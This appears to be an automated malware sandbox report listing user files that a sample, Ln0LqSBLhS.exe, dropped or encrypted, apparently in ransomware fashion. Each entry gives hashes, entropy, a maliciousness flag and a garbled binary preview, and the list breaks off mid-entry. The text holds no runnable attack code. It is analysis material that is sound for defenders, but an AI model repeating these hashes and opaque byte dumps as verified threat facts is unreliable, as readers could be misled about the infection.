                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: (...hLD.|B.%Mq.{x....(...b...~...>.c.VG..{...*.DCuEU...U.,....IO.:m........b&....9Y.Q.*}F..5..'=;.cI~...n...k....._..CR..P..bV...+p..R...v..P20..,n...x.mV<a#.)&..12q....TZ<.H.@..q..Ud.]k 0.:C.N.4>.V7)....._Cn}....Y7...V...Ns....J...~N.~....M.0<....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\NJ1L9FBN\www.google[1].xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):506
                                                                                                                                                                                                    Entropy (8bit):7.523221990878496
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:JBVNatWTwW1TXxeKE+nctdhVg3LZX9+AfvDGcii9a:JnJ8Wt7nsDg3j+ACbD
                                                                                                                                                                                                    MD5:B98EFA1FF43318DEC8F63F6E202DAE3A
                                                                                                                                                                                                    SHA1:42CC982D6FBB73E3C49E29E38AA2010FB1F06F99
                                                                                                                                                                                                    SHA-256:1284F9B8C99089F4D5E8F838AF2A111D23679693EE9B0A73C622DD7B25FE4BD3
                                                                                                                                                                                                    SHA-512:5EB198328C63FDF43AA0A4B221CA5A72FFACF59BE900FA77529F82C28B49A903449F34E188E60A5B13007E29C0E287DB65DEB607051E0C83012E0B3E21EE87E4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .xI.1.S.3..~jh"....b.e. ..i.........9..xhU.....-...k....Q)[V5..-.4....p..7|Xj.20.O.g.I|.C.c.E...3K.Y.....x..eZ.4......[.`..H.1.(o...v.x.=<A/.&.`..z..w.....w.=?.b...i'.,U.!.2GP.OB.........Y..J4RdJ.A7L.])...r...o.r?..{.x^.L.R.m.K..*.....^...k....Y.v..t.........T.\.?6W.D..j.n...0..\$........{....#.ig.h..}~.._[..TM#q.~...i..b..Q0N.%.h...=..^......V.`(.<...`@..C.1$..(!3C...I.z........O.t...^........15VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\WP4N5YVD\contextual.media[1].xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):495
                                                                                                                                                                                                    Entropy (8bit):7.513204811837532
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:SAOvA6HnRsrbqtZEhjk9hYqaSWUD7JS3cii9a:Jgm5IWqaSNJS3bD
                                                                                                                                                                                                    MD5:FC8186F65F2BF43303DCBB086824B842
                                                                                                                                                                                                    SHA1:909270CF20C6F09E4144BBCCD81A387911FA31CE
                                                                                                                                                                                                    SHA-256:E0F424F0E8A52E6150714C3A475C3946DB1D82F4FB939FC680371C4EB1FD4788
                                                                                                                                                                                                    SHA-512:EAA1A0603D385AE3EED5AF9A55B20E4129076D29C4C53B483065137F6EC8B8B716FC4C954C382E2C4D5763E2F752BBC2C05C836AEDA894D3CF9736413E9CC6C9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ;..).....-6........6u..x+....C...e)l.-..j7CeS..\...bqy.J0?.W..X4.....%.}.lWF{L....8CJ..2.tZ.....K..r.7v.....xc.6V....>C'..g.U...-.w..?9.....X.ND.....#..C[.g!.O@...R#...?....O.$..bh....#J"..J*T...&..".3.v.8.6..{.R.....q...%(.H../.#..}o]...M.a..1[.D.[.+.v..}..y......c.n.....:p.C*.4A..Q]...!|H....\.eY..]......0.........t........,...V....?.J,......w...2X.._.....2^....Q......>]..=@...\...Rl..t5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\YU3ONM33\www.microsoft[1].xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):565
                                                                                                                                                                                                    Entropy (8bit):7.574513237203167
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:XngdlQTzhrqizkzTq86RtPgnrf1Cuj4jyFucoa6ZyYvZkXcii9a:Xng8hDdztPyTsuj4+sXHBmXbD
                                                                                                                                                                                                    MD5:5E3B24C2123571C65524E4EC199F9840
                                                                                                                                                                                                    SHA1:7EDB55E271176FC5D6F83EC34428C884BD88EDCD
                                                                                                                                                                                                    SHA-256:58FA08C435969690BCA3A8BD79355FE8E23141073DBFB7E76DD80DFBEDBB885B
                                                                                                                                                                                                    SHA-512:0423EEFAA9C807C16724D1D860F25B2D32B1A3CF9B787AEE8C15EF44B1B81436262AA1808E9248D70E45FFC3A45700C72BDE6ECF36D0709B5E04050CE50CFC2C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .K./o*5.9.Z...!....t......!T.U. j.U`....x'.2.qK....$.|...%......x..jCT.1OJ."..T.&l.^.......k.~..u3P.....m..y.+>.FJ*.:X"A.xU..Jd..-....B...|.yH.6.....w...=]._...._m..]..T......^....7..,I..^V...T.....o...Y%..=.....'t.....#.=..yb........IxG....W....>c#...vk......:[.OL.G!&.\P}.......AM."&.y..l:23..Q..mF..2.H..W.0^..-..@-l<.....=..."..@&K.*..[D.&..n....xw.....8.....2KE.Icr...eC../.......M..+4I..327'.q&..v....J.8..3.a...e.!!d.?.ZE..%$..L..._...<.i.\~.d.%IW.\B..F.[.S..R...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1364
                                                                                                                                                                                                    Entropy (8bit):7.822015497510397
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:UgmHdnV4+mWtilOiLvlmQSJ5E4HQz5+s/nA/nVwwGluXYjEnXbD:Ug0naOtil5pmfKCQtHDIXxnrD
                                                                                                                                                                                                    MD5:4E4C314D3E62C492A224CB32BE62E7EA
                                                                                                                                                                                                    SHA1:2693DC13CDAB513DEF68B1E9162C6F1D6A6809F4
                                                                                                                                                                                                    SHA-256:46D3FFCC71391D21B5738598E3DB2F1CA57CF3E8E88D1F5E4B58CDA006F0C24C
                                                                                                                                                                                                    SHA-512:7CBD8596C8579AAFA3A011F35FE05AD8C3C41FD539DC8AEE9707D7F4349FD710A6303DEBC7699928DDA56CCF17E87F07FA49DF8FD901C1FFBD1BB00DF51BE2A7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...cMz..........C3u..8.=.F....vk......Dl.QL.F....B.Z...\l.ZX,9O..~2.X....S.....>mh.*..v.-.F~.z ..qW~..A.Uw...$.5.....>Y)wZ.L...L!.3;L.c.=W..a.:.$.S.5Q.\...w.j.|...`.......5>5G.}.6#.5Wp0Xm].1.\....Di....G.O....W......]I..i.a.........B./..m@.jo.v.K.K.6.A4..Y......hE.z_.s...4:.......|. ..y.........N.}<...X.PzNhoN.8WJk...f.`..!.kY....C6.a@k...._..Y.R.....=..F.9.R.a......d...{..x.....\[.-.G..Q.L.p.S..<.S.^.0=..-.M..H.mH...zhtH...n..:.Y.".]....d.I+h..!V.S"...A.Mz.5..).....\...)h.>.Ua..)(!..]]...h...@.$h......k.f...L..T.h~.#.....q^k0.M.{...q.r.S...qly[..PStL......:G.a.@....Y..e?.K..*B.{X.... .W.."[...bg.....3..97_.@.U.......#..E....n.z!<.D.v../.....b....S...... ...yaA....Z...j....o......e......K..6w..hS...s...[4qzD.......9.9:...jF..#.......q..`...p:A.w.j.....bg.i..C..\..*[..X..)t.0=PE(..B.*l....Pd..!o.w..Y.8..Z...8.G.%.~.K....G...Z.....L...U.z.eI.bS.P.\.a.R.p...>.X..E4.-..A..g.ff`K..$M(.."<x0.S~...x....g.Q.Vn.cW.zv#bV......B>....f.k.k4.[L.!..L~Z."9
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998912267073351
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:MGRkqlsby6daTh/q0/L2nT4EDCERHUN/uhFwe5DpDeC/vahTGLpV5+qcmBh+3:MGuqlRmwAX4EDxH3hFwejDZ/vahGVV58
                                                                                                                                                                                                    MD5:DE6AA5181C33599240641CDEAD55E9DF
                                                                                                                                                                                                    SHA1:4F9D771B3EC47790D6419E8BE3F11A47978480DB
                                                                                                                                                                                                    SHA-256:2A68D55B3330218F973AE2D7C323AE1AEE2A47EFFE2863EF4E02D8207BBECB39
                                                                                                                                                                                                    SHA-512:5D99F376801EA07D42B4D095D39CDBA23DEC6B271B7883A146C3FA74ED0A8FC4FC5757D651AAE559FAEA15DE7065D9181B97ED4930DCB9422C00526DAA3DBD42
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 7....zc.j1...................G..4.-L.f...I...B........0..s......d.+n.A..g....uj7.s.S...*....1....Q>........Z<}t.......Q.............f...("WJ7....#,2..vU....H....:.....?.j......c..SO@..!.4..U..,b.Y.8......$dw..p)N..Us..@.IE..4.NY...6.N^+.p.....&.q.M/Z........=E~T.+b..'...A...:...`g..&J|.J....l.z....KI}.."2&.$T.+..%.(p.7FAvF.+....9....An......6.4..t...n/o...e.1e.....I.FO.$.....:.;iy.).E....Wg....p..^*.......X...D......k..X.....)...Px|+.......}.`N...$h.B.....CuM..9..<=...f....@...d.....n....r......DIb.o.P...F.8.9..J./%._'[.d.p._n.v..M}%W~.X+...SO$6h.7...j.......bb..L`s.....Jm...^.Ox..PN...Mu.u.C&.:2..fp...."x.4.....oT..6[W7Uc.......E|.+...D`..v..6$8....baV..D+.n...G..........S..*....s4.....Q.!H....)..k....q..ju+.......X.Q..^0f...J0[(..@.`}.....\j..OD..b7.{..-.k.3....F......[..4J~......ynF.H.L4w...6..7.......f.uB5...........U$.W.(.*...\v.~\Pn...[.<......*>.\.;.[.f.G0..GMp..Wl..R@2..P...9p/...b...xY^.p....pW..JN...~ .r}.p.|..A=.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):9895
                                                                                                                                                                                                    Entropy (8bit):7.982428262472945
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:RVXQK7GwPtzyF2h6vK9j49Ebi4O+766+G/XAPWxSGSqp6ZVl4f1C5B9bWkf:RpkwPtzyMMq4f4yPcZ6jo1Cckf
                                                                                                                                                                                                    MD5:D00A8509CEC0AF4E30885487AE1070D6
                                                                                                                                                                                                    SHA1:237DF7DB499669118F2A6EC61889D429357F62BB
                                                                                                                                                                                                    SHA-256:84C009C605C5D2E57547EB736AEB97B9D2674C251B008DF46A7A0D7589FCB5A3
                                                                                                                                                                                                    SHA-512:44ACD87A70987134B0E1B481D4028213A395484253C2F4FD2017CA27A74A028C7241542DEC8DE9B22095E38A853132EB2C69C5434E5A6F9D955C259D9B34B468
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..U3..+......."[.d._..3.`....+.d.mi..f.........6.o.Z..H..d.X.VE.V. ......k.=5... JK./$.O(....Rp.p..Y..~..;....<..............q.>..H....Y...WQ.>..bi:;....{....x...u.O ..E_k.9R....?..h.4.A..q...!?u....j....U...p...h..2'[G=..u.2j....._.U...3..2.U.0'Q....X........q...9.!<rWG...h...F....G.d..$...... ..\.H3.......S.B.'0.....(..LU."a...Y0.....0...5)...._-.D...O.:.2.'..c(........B#{!.H.:....W.U...D......~.w....,..'...s....&.t...&...O...Q.s.sb.....3..e.........f........%KN..._#m..2...[.2.\.Yg)m.y...@...e..l...G~g.UA...O...\.....p..e.|.C,..........<B.pf.._)A.Y.3.1.\..Y../..I.....U..?I...@...P.p@..^.B.L.^.l.K.....G....[....x....?N.}.~...^..%m.A.....Sv..4#;W.C.$ZD6.,.fK....j...*.H.'....3)..<k..[t.sYW.U.*..q....U.c...`K.].Z.E.. .5..B..Pq...`..(8f.k.V..9...2..2I/Y.]Pj...@h..^!$D..=i...U.I....t...R...h. @...i.....@.V...Pa.N.........5z.P^.X.]...g.W)7.K....>zF......H.i...=t.........h;9.!...xr..Bt. ......;.._.n!..f/.)dd..w .."..z.H....-...>.................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99899410562921
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:EeDoejIgQBbbdFjmTHDbN+y5wPxJoXUWPVE/HA78eKaPSACHokrJz:EeseMgQB/IDrXZYEVKa0Ho4z
                                                                                                                                                                                                    MD5:B2FA0B2BA2F40A2B252CCEEA6C92E1A4
                                                                                                                                                                                                    SHA1:DA854B0845C85BAE3C7E612860E760D8C49E9575
                                                                                                                                                                                                    SHA-256:539874A08B9536ECBB00564EFF9BF79A1A78C04BA702F17F09341458637EEEEB
                                                                                                                                                                                                    SHA-512:809777AB2AA9D253F8893485CA40F72E6A2A0EE6DCE2051B72327AD7285018553AFF6D0CBEEF1F2394C33C5575BA20737947B4EFA0192902AE0B0BA6EF6725B0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $........}J......I..V.G..d.D.9.;,J;......-...T^j.[1op.uSi..b.....T9^...........9...Nz.xp...h......O.-5..c1^.K....[Aqa..i..,..0.a#Q#....5.p...\.t...y..x z;.Y!..E.....R..rv0.9.!.4..^...oh........\..&z..S.......&...L6...87:...2..r...........8.I;..i#....$.o...P.M^kc).@...D..SCS.....dH ...7.MZBm$..1.n.E~.....Zi......5...m.G..._.,.L\jp.1p.l.p..L.gu.C...@"....!.......Z.....q*..ff0..~...y....?..>....v..k.Z..}.[Z`M..S...q\tw.....R.<.t.vq..R4...rV.M..Z.*M..~.o2......h...<'.....+...3.@?. .3..gn(.!V.q+.3...M.W.vZ.. .}..q.[......j...{....;.....#..s.......pO;S...y.?.;=.....C.|........p{...%..I/...S.$y/.%....]V..~.D....]....ua....D4pD..f...f.T.K%.....)?1.....^.....e....G...R..-\...<....H.UO......0.Exo.1..S...Em.(#.......6\....'..FJ..5.t*....!.!Ew(.....>.=..y.:N@.a..b...-...iJ.D..../r+........>e.....y&.zc....e.]..k..i.r.z...7W._.(W.......o.oCEy."...g.....`...1...@b..'.OI....+...rpD..'..b.&.k.4e .[....lJ*5...J.c.4_...|_.[7.."...Mu.D(.V0.....Q>_.N.........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):63927
                                                                                                                                                                                                    Entropy (8bit):7.997165266892772
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:sECBnLc7Aegy6gMeOowCEZI0CEN+Kklv+hOLxEEuu4EuSF4yD+xMZxe9:sXLVXdeOozEZI8N+tlvyOKlOF4yKxMZ0
                                                                                                                                                                                                    MD5:817C7492F71B2F0046129E77D67AB3BD
                                                                                                                                                                                                    SHA1:350D7EB934A5EAAE28B8099CEA1F52EDCB3C3EC7
                                                                                                                                                                                                    SHA-256:F236E601E881787A88B1744FBC2AEC59A4220137400C825960183DE81BDD995E
                                                                                                                                                                                                    SHA-512:C70E4BF482EDB41C7807E92EBB87A84A211349B13BFB2E15ED4C0D825D9C246A750631AFE8B3AEF2431383067A29B46D0CA9B1AC57CB9EE1D3A89B97E1758E26
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Fl.d....q.{.&..4.VC.....)q6.3.[..-.I.....d.}.q.6H.*.'.G....1o8!\M..k...-...0...Pt..D...(X.D...=.@a..cK.............M..D...'..,q..`w.C.1.....R....w.......i..p.q....Lc.2..B..E..V=..[.L...+..9.^...tXs...u..%d.B2F~-?...~..}.>....z..w.a.@&.....(.~........B"7.....Y5.M7....../....O....F..f..u.y@[...Ws...-.D.J......\...B.d....%.N.IFE...N.P.8f.....I.c.:Z.....9".Y..v>.7.5j]h.Y..c"!w......O...l....-`..l)dv.....K=.{............`..l..eD.h..d...~....7l..U..J....&..O.......3x..(....me.S.=..w...I.I..i1d.&;Q.{....S.q.CI.$.}.*.>5.<.M.Eh....G...w.%.. .Q<s.}}......n.y.!..~...v..a...[...7f.G.....G..w...?..'.q...d...5....}.d...<].(&..[......B.p.P....(Xl....A_.;..J.|9...7..(+\$%.t...S......Fr..|M.A|......../|]2......:.._.......Me.S|....}..$..TNK.;.....C.b7(...1l.A.9....q.U.........4.p ./7.>..j.#.x.....) . ..u..,..(o..,.x.<.*K......J.....>2.....cn!.==.=..|K.H..@x.";.!.i.6EcZ.}5dP&.m%.o.v.5o.....`.S..{..'|...c.FR)*..A.9a..5.J...}......*2..3.>E...`.<... ~..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):927
                                                                                                                                                                                                    Entropy (8bit):7.75982768664986
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:6PlxqoIij99kAIrYjoYOft63SxRpN2OrPxghfXbD:6d5rIso163UpvrmJD
                                                                                                                                                                                                    MD5:2D371357330C8A1CDA9F35E1A96CBF2D
                                                                                                                                                                                                    SHA1:9245DC1EDC834E0468D3E17097BA094B33586BE7
                                                                                                                                                                                                    SHA-256:B0A2392FCC51F565DB276219F30012934D7572B27839E268559848A5046EFFEB
                                                                                                                                                                                                    SHA-512:9BF2DEAC404164AFD55A7DC3E053AA4693D0AA1635B0B9CF567061BCB62D71E2178325DF4BDC7D7FB3041FC5BCCDEDBBD878AD7D3EB10A240892BE3C26CFCB4B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: \.Y..`....a..........f..z..\Mw...n....\.*..Y.&.....Z..H2....$9mJ..gs.O.X... .;...@.. AN.q0...0z{...w.=.`..C1[.*.d....+NS...W.......o.Y....@..,[..M..,.....<bbY...8...wKB.....D<v....h..R...j.n..%.)..Z...s..@.X.!.'....=u......`.....j.......Kk.F.K........1...'9.2i..Sq)...`.I.!...O9......o....x.=G:...bd...j.Q.:c....L2....M.4....`.Q|I..v].....^o.M.bOF.t..<.s.d....u.{..I....D........0..R....K..7.h..$...|;R3.9........(..?.t&.lQ..b..J...Ar......H.sS..S.....~...?...~.=...s.j_...4p../4&.....4...4.1.a...M..;xp.........S3.a.9!.&.].....=2...-.aDR.D.U.x.x.... ....ja.+.m...:.}x.dI.?Ip..qxO...x....@.H.n....p..2Z.3v-..*\5n....1.o3._C).]........3..bdA...Z.s..m.K...ryt...x..l...OAI....+p.I^.e...h.q...=....]..c\.L,.-..T...G9..U.]....V8.....p.k.....E$.nW...I.".x..s..4"72.at_.'.....|H.{@.......e.p+F..@s{.=~&5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97854966518348
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:f42dNv0om0rZJaZByJ7UDp+8DJKfe2a2hfzlxygcAJpjibq:g2ZrPaC6DpdcBye/uG
                                                                                                                                                                                                    MD5:597DB45D97EC507EC2505605FD01C652
                                                                                                                                                                                                    SHA1:74C36E2D55E0CC44C47D828BA00731714BA83456
                                                                                                                                                                                                    SHA-256:C32E3517BAFD09257DEBA18EB352AEFA9B1A1755CB7AF07CED8264679AA46CAE
                                                                                                                                                                                                    SHA-512:1F632C6556C8D7459E25574D32DA9F3CF66B393E602A8E6EE48174B3F7ABA0E090E6E43D5C7A122CDB8B272CF6C4D84A93FB9F96A5ECCEC08D5FF3E3EF14CB6D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]s.....3(Pn.f,.j.......}u..-.....%o..o...Y.x\....\.Z8...3[.......7;.=..."h.+*.$/v.t.wds[..N.:.wuXp..t..Xr....tK<...+%.'.9..p.+...A........[pNxULE....p.$.j...t....dgRp.p^$[.)W.A.D...]....!.....s&...l...7._Z.3[.5..x.._..zo.....v..fB..............2...&......e..<(..l......y...a...j.s.a..W#.?.c.<..>..(....x...Q.h`s@.G4.({$.D....\.p!.........t.c....E.....&e.)......<.^q..V.-...W..*S.W....c.......Mjq.`.h...S...-..O.?.s.!z\.|-.QmN.:jA.....F!&w.q.....\.(.n]e.-;..I.a...s..W.%.\.;..0...~.%j.....@..fk...U?b4..L.......M.Ox......2..{..5.....g...i.q.R.{.k\+...JDe.b.E.@........9.PG..z..'._xcyL.FoB)...`.1........Vn.*.).9#.......W*1.)...Q....y{'........W Fz.k...w]2...d.R..vjvN.5)g_P.nO..:..k..);..,....h@@..;p.n.rv..7.y.x......'....L.....B....C.....i9..o..A.o%.>...u@..[h....s./s/...1.EnZ3.....j.......Q..Z(i..f.i.u?...F......Kl+.a.......Wp"~. .6..^-.?.....6.iI........p..<.Yd..C|....~.m....u).A">.i.Mk.8=.k....o.V..ch*p{.....<..BJ......iN'P
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998792179900664
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:d6/lvIKP00g3/MKOjSGdEtM3Ye+9VGVmv+LhAJQ5Db0x36mQVe:dST83/MKGdEtmarKAJiPyt
                                                                                                                                                                                                    MD5:BAE3D4FC2EB4ABB1296C36F0A078F35B
                                                                                                                                                                                                    SHA1:633B5736B0D27C66A6B9ED3491EF26D383DECC1E
                                                                                                                                                                                                    SHA-256:FA1A3F468BBB803A063D44503BE7267CDB062498CE3FB39B7E6C5A5CB7B488B8
                                                                                                                                                                                                    SHA-512:39C143732ECB2CBEAAACB21025265E5AD30608F12AC933A75E87C9B4496220C610096CE9EA2DDC255A8D225B997F02E1A536DC685DBAD6C0724DAF1631AE697C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .vY...~.........sz.*........6E.U..J..t............J.c..S...qK-..G..4.Di.O0. j...p[T..?..].5>r...V...MJ...1x...EA}.....D.rY]/....vGU.v..8Zz`.?x._...E....Su%..]...y...'^K.o...^N.?AEU.V......(Nn.o....oVG,.............).S..Mu...3J$h&..q....vb......4..r..:.7.s....6Z.o5...$.....DQ......@.-W.e .kH..R..Z.........]...Z.15....<.2.WX0.8.].{..Su.r.p...@.o....x;oA...f|;.`....5.(.|........x./cRz....J...(..fm....d.C.g/...K.b1.1"J/...L....J.....O"l.....5......T.9......u7R...D.q3,...].v.Z....,4.0..&UxYr.-..)..R.P)d.?..t..?......._Z...|.rLL...0.v..Z.;=..q..fM...50+..@.. ..U..}.0...~#`..7YGx..J...=.9.`..f...$e7..\2OZ..6.^.+..rt../........2L.....#@..[....@2.......L2...^..v)......+6.T0.;(.k.gg'.|\..^J. .....e.].".J...^]....q-.......b..XM...aI.kN..t52..;...m{..i.fE........{..Y.O..~>9.V.^.._-@%..thq^r.^...7t.U....>....L ..A._=\n....".n.H..].Wk<..... ..}.....g...X.z(.}.xGhul.]...-...8xj.eM&.....Q.....'.....[.c.%.. ..-..4..84..\.:$'.c#/..'.e.@<].5...B.3$Hf.D..C0Q...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:SysEx File -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998859064377633
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:4faXYLYHQ1R2X15nB/tZgGTLlN19WcHM0BqzOF+AjSXpThIk/w1:44YLxRE5PTBN10cHd6AG9h3/w1
                                                                                                                                                                                                    MD5:8937FC62031A3BE6C2D51B04CFCA03A2
                                                                                                                                                                                                    SHA1:856809A74B32846D45E3B971F2DF463BE2915423
                                                                                                                                                                                                    SHA-256:04F744FE86171F95D69442E9509616593B07776768AA98C20AA9A04BD5236048
                                                                                                                                                                                                    SHA-512:8B4F46BE88CB77DD0CBBC3CD07566CC2CE44D4003BD1695EA0494EADA872588A469D539FE023CEB7D7FBD1AB5056F6E964F4A3388752167C7F551DE607286541
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .q.....q....UW.]......5.tY.SXCC...>t7^c...)^3m.f.9..j..n.s.....1.~....H.,^".......t.-.-rH.@ Nd...{.....A....uG.n)...._.S-X.8.....P.oE.4M.'i....M.d.\{....J..o.[..Xh..R...Ab.!...9^.b..eqy.+.L.Z....l.1Dh.o..b4l3...i_..._p.T.A.2_..._.0#...aQ..Z...b&.e.).1..+..r....^.......\..EF.~mFr.._..Dq...C.E1MK..]...M....4..&....r2E&x1.Z.h..:..8[.K$?.....cd.kAW..4,..w.8..>..:1.S....&.'.D......1..T|'.@.K.......tn...........i..|....\.E...e}....Z.s..9.......I..a.....-......:#..+"Ff.._(.z..8.a...... ..%"te..<.;...F..^...UR...4..6g.{._..?.V:.2..N87..^.z.u..Y.ZK..~.J.+...".!9...|... ..J'..*"..w....:.......\i%."...n.>0..Q.^@.....c.Pb.V..zl..B.Ji.{%k..{............2.Z..u.<..9.2....0U.hC.m5.m..+=z(Q...49.....4V..Gg....&.@.....S...!DP..3.."..&..-.).S.R| .."%K....U.......).sk[MiF.?.lP.X...7..H.....*kO...P.z..9E(M...c7|...v..I..7..\a|9ES1.v.U.\...........H.t....9>..Yu.4.bZD.".c...\.P_v.....a..)......P.n$F..s0.... ..L....6... .!.a...u,.b).\.)6...#Q..d.....[....jc :
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998861631260451
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:kudZy7nPAQRXlyKDmtxVszOsyAqnHdMBNR3C4DpdYDRLsq6cKC+6RF:kuHy7tlzm3KydHCRScYDRLsqhNz
                                                                                                                                                                                                    MD5:306D5C39EE73DA51B0742CB24AD4F0E4
                                                                                                                                                                                                    SHA1:0D12CA47FA3B7EC4C3D1359F048799F74B2C5AC7
                                                                                                                                                                                                    SHA-256:853540805B978F73D209FB2CAEE9C03606B9EAA755A91A2DCFD418FC42552561
